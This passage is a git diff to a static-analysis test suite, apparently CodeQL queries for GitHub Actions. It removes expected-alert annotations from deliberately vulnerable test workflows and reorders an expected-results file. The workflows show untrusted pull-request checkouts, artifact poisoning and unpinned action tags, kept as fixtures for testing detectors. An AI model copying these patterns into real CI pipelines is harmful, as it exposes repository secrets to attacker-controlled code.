$ Alert[actions/unversioned-immutable-action] + - name: Log into Azure uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 with: creds: ${{ secrets.AZURE_CREDENTIALS }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml index d5de91480cb1..f679b772e340 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml @@ -16,8 +16,8 @@ jobs: ref: ${{ github.event.workflow_run.head_branch }} fetch-depth: 0 - - name: SonarCloud Scan # $ Alert[actions/untrusted-checkout/critical] - uses: sonarsource/sonarcloud-github-action@master # $ Alert[actions/unpinned-tag] + - name: SonarCloud Scan + uses: sonarsource/sonarcloud-github-action@master env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} # $ Sink[actions/untrusted-checkout/critical] + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml index 96de593004ab..6347db51e3c9 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml @@ -30,12 +30,12 @@ jobs: let fs = require('fs'); fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/rsc-pr-build-artifacts.zip`, Buffer.from(download.data)); - - name: Unzip artifacts # $ Alert[actions/artifact-poisoning/critical] + - name: Unzip artifacts run: unzip rsc-pr-build-artifacts.zip - name: SonarCloud Scan - uses: sonarsource/sonarcloud-github-action@master # $ Alert[actions/unpinned-tag] + uses: sonarsource/sonarcloud-github-action@master env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} # $ Sink[actions/artifact-poisoning/critical] + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml index 4cf7a49245c2..2f3b0bb876f6 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml @@ -59,4 +59,4 @@ jobs: with: ref: ${{ needs.bump-version.outputs.release_branch || github.ref }} - - run: ./bin/build-plugin-zip.sh # $ Alert[actions/unversioned-immutable-action] + - run: ./bin/build-plugin-zip.sh diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml index 1404c559b0a8..c825cc73813b 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml @@ -29,7 +29,7 @@ jobs: run-id: ${{ github.event.workflow_run.id }} # Don't fail a build if the file doesn't exist continue-on-error: true - - name: Extract previously uploaded build scan content # $ Alert[actions/artifact-poisoning/critical] + - name: Extract previously uploaded build scan content if: ${{ steps.downloadBuildScan.outcome != 'failure'}} run: tar -xzf build-scan.tgz -C ~ - name: Publish @@ -37,6 +37,6 @@ jobs: # Don't fail a build if publishing fails continue-on-error: true run: | - ./gradlew buildScanPublishPrevious # $ Sink[actions/artifact-poisoning/critical] + ./gradlew buildScanPublishPrevious env: ACCESS_KEY: ${{ secrets.TEST_ACCESS_KEY }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml index 9b7a6c535c61..b1d776ef6c8a 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml @@ -18,5 +18,5 @@ jobs: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 with: ref: ${{ inputs.git_ref }} - - run: | # $ Alert[actions/untrusted-checkout/critical] Alert[actions/unversioned-immutable-action] - ./cmd # $ Sink[actions/untrusted-checkout/critical] + - run: | + ./cmd diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml index 16d84cd70f73..5f67fecc09a5 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml @@ -17,4 +17,4 @@ jobs: - uses: actions/checkout@eef61447b9ff4aafe5dcd4e0bbf5d482be7e7871 # v4.2.1 with: ref: ${{ github.head_ref }} - - run: make foo # $ Alert[actions/unversioned-immutable-action] + - run: make foo diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml index afbb3f0a433a..cc7f71a7b3e4 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml @@ -11,11 +11,11 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} fetch-depth: 0 - - uses: actions/github-script@v5 # $ Alert[actions/untrusted-checkout/critical] + - uses: actions/github-script@v5 with: github-token: ${{secrets.GITHUB_TOKEN}} script: | const { foo } = require('./foo'); - # $ Sink[actions/untrusted-checkout/critical] + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml index 8c45b9f89303..d9aa2973e007 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml @@ -30,7 +30,7 @@ jobs: with: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - run: npm install # $ Alert[actions/untrusted-checkout/medium] + - run: npm install working-directory: scripts/github-actions/semantic-pull-request/ - name: Lint PR Title if: github.event_name == 'pull_request_target' diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml index 5d143bb3f859..f82f493cd6e0 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml @@ -22,7 +22,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Checkout # $ Alert[actions/untrusted-checkout/medium] + - name: Checkout if: ${{ github.event_name != 'pull_request_target' }} uses: actions/checkout@v3 with: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml index 99b3c1d49008..7a346a897e45 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml @@ -21,8 +21,8 @@ jobs: persist-credentials: false ref: refs/pull/${{ github.event.issue.number }}/head - - name: Setup PNPM # $ Alert[actions/untrusted-checkout/critical] - uses: pnpm/action-setup@v3 # $ Alert[actions/unpinned-tag] + - name: Setup PNPM + uses: pnpm/action-setup@v3 - name: Setup Node uses: actions/setup-node@v4 @@ -33,10 +33,10 @@ jobs: - name: Install dependencies run: pnpm install - - name: Build Packages # $ Sink[actions/untrusted-checkout/critical] + - name: Build Packages run: pnpm run build - - name: Get bench command # $ Sink[actions/untrusted-checkout/critical] + - name: Get bench command id: bench-command env: # protects from untrusted user input and command injection @@ -56,5 +56,5 @@ jobs: echo "$processed" >> $GITHUB_OUTPUT echo "BENCHEOF" >> $GITHUB_OUTPUT shell: bash - - run: python2.7 foo.py # $ Sink[actions/untrusted-checkout/critical] - - run: pip install --no-deps . # $ Sink[actions/untrusted-checkout/critical] + - run: python2.7 foo.py + - run: pip install --no-deps . diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml index bb28d082ac57..381cc16a6d16 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml @@ -23,7 +23,7 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} repository: ${{ github.event.pull_request.head.repo.full_name }} fetch-depth: 0 - - name: Generate openapi.json # $ Alert[actions/untrusted-checkout/medium] Alert[actions/unversioned-immutable-action] + - name: Generate openapi.json run: dotnet test tests/Jellyfin.Server.Integration.Tests/Jellyfin.Server.Integration.Tests.csproj -c Release --filter "Jellyfin.Server.Integration.Tests.OpenApiSpecTests" publish-unstable: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml index 2c8007b99846..6f7ff665be3b 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml @@ -13,6 +13,6 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} repository: ${{ github.event.pull_request.head.repo.full_name }} fetch-depth: 0 - - run: # $ Alert[actions/untrusted-checkout/medium] Alert[actions/unversioned-immutable-action] + - run: sed -f script/config foo.md > bar.md diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml index eef43d011d4c..6e7612144bcc 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml @@ -7,13 +7,13 @@ jobs: runs-on: ubuntu-latest steps: - uses: foo/bar - - uses: foo/bar@v1 # $ Alert[actions/unpinned-tag] + - uses: foo/bar@v1 - uses: foo/bar@25b062c917b0c75f8b47d8469aff6c94ffd89abb - - uses: docker://foo/bar@latest # $ Alert[actions/unpinned-tag] + - uses: docker://foo/bar@latest - uses: docker://foo/bar@sha256:887a259a5a534f3c4f36cb02dca341673c6089431057242cdc931e9f133147e9 # SHA-256 pinned (64 hex chars) - should NOT be flagged - uses: foo/bar@25b062c917b0c75f8b47d8469aff6c94ffd89abb25b062c917b0c75f8b47d84d # SHA-1 pinned (40 hex chars) regression - should NOT be flagged - uses: foo/bar@a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2 # Invalid 50-char hex string - should be flagged - - uses: foo/bar@a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2a1b2c3d4e5 # $ Alert[actions/unpinned-tag] + - uses: foo/bar@a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2a1b2c3d4e5 diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml index 5119b7384ea2..15d4813c40e9 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml @@ -8,14 +8,14 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ github.event.pull_request.head.sha }} - - name: Setup Node.js # $ Alert[actions/untrusted-checkout/critical] + - name: Setup Node.js uses: actions/setup-node@v4 with: node-version: 21 - run: | npm install npm run lint - test2: # $ Sink[actions/untrusted-checkout/critical] + test2: runs-on: ubuntu-latest env: HEAD: ${{ github.event.pull_request.head.sha }} @@ -23,10 +23,10 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ env.HEAD }} - - name: Setup Node.js # $ Alert[actions/untrusted-checkout/critical] + - name: Setup Node.js uses: actions/setup-node@v4 with: node-version: 21 - run: | npm install - npm run lint # $ Sink[actions/untrusted-checkout/critical] + npm run lint diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml index 644738a76059..47a0dfc6bd34 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml @@ -16,4 +16,4 @@ jobs: env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} run: | - gh pr checkout ${{ needs.should_run_it.outputs.pr_number }} # $ Alert[actions/untrusted-checkout/high] + gh pr checkout ${{ needs.should_run_it.outputs.pr_number }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml index 1001c8549785..0a38be8b12be 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml @@ -10,4 +10,4 @@ jobs: steps: - uses: actions/checkout@v4 - uses: ./.github/actions/dangerous-git-checkout - - run: yarn test # $ Sink[actions/untrusted-checkout/critical] + - run: yarn test diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml index f06228207876..7e154502c139 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml @@ -32,20 +32,20 @@ jobs: repository: ${{ fromJSON(steps.get-pr.outputs.result).head.repo.full_name }} ref: ${{ fromJSON(steps.get-pr.outputs.result).head.ref }} - - name: Update version minor # $ Alert[actions/untrusted-checkout/critical] + - name: Update version minor if: contains(github.event.comment.body, '/version minor') run: | ./version.sh -u -n echo "BUMP_TYPE=minor" >> $GITHUB_ENV - - name: Update version major # $ Sink[actions/untrusted-checkout/critical] + - name: Update version major if: contains(github.event.comment.body, '/version major') run: | ./version.sh -u -m echo "BUMP_TYPE=major" >> $GITHUB_ENV - - name: Update version patch # $ Sink[actions/untrusted-checkout/critical] + - name: Update version patch if: contains(github.event.comment.body, '/version patch') run: | ./version.sh -u -p - echo "BUMP_TYPE=patch" >> $GITHUB_ENV # $ Sink[actions/untrusted-checkout/critical] + echo "BUMP_TYPE=patch" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml index 145cb77b8298..c802355d102a 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml @@ -13,7 +13,7 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ github.event.workflow_run.head.sha }} - - uses: actions/checkout@v2 # $ Alert[actions/untrusted-checkout/high] + - uses: actions/checkout@v2 with: - ref: ${{ env.HEAD }} # $ Alert[actions/untrusted-checkout/high] + ref: ${{ env.HEAD }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml index 3cbd9d698dd7..bcde60f55cb8 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml @@ -13,7 +13,7 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ github.event.workflow_run.head.sha }} - - uses: actions/checkout@v2 # $ Alert[actions/untrusted-checkout/high] + - uses: actions/checkout@v2 with: - ref: ${{ env.HEAD }} # $ Alert[actions/untrusted-checkout/high] + ref: ${{ env.HEAD }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index df0776a8b0f1..3c5f6bf93e98 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -1,22 +1,3 @@ -#select -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning11.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning12.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning21.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning22.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning31.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning32.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning33.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning34.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning41.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning42.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning71.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning81.yml:3:5:3:23 | pull_request_target | pull_request_target | -| .github/workflows/artifactpoisoning96.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning96.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning96.yml:18:14:18:24 | npm install | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning96.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning101.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/test18.yml:3:5:3:16 | workflow_run | workflow_run | -| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/test25.yml:2:3:2:14 | workflow_run | workflow_run | edges | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | Config | | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | Config | @@ -73,3 +54,22 @@ nodes | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | semmle.label | Uses Step: downloadBuildScan | | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n | subpaths +#select +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning21.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning22.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning31.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning32.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning33.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning34.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning41.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning42.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning71.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning81.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/artifactpoisoning96.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning96.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning96.yml:18:14:18:24 | npm install | Potential 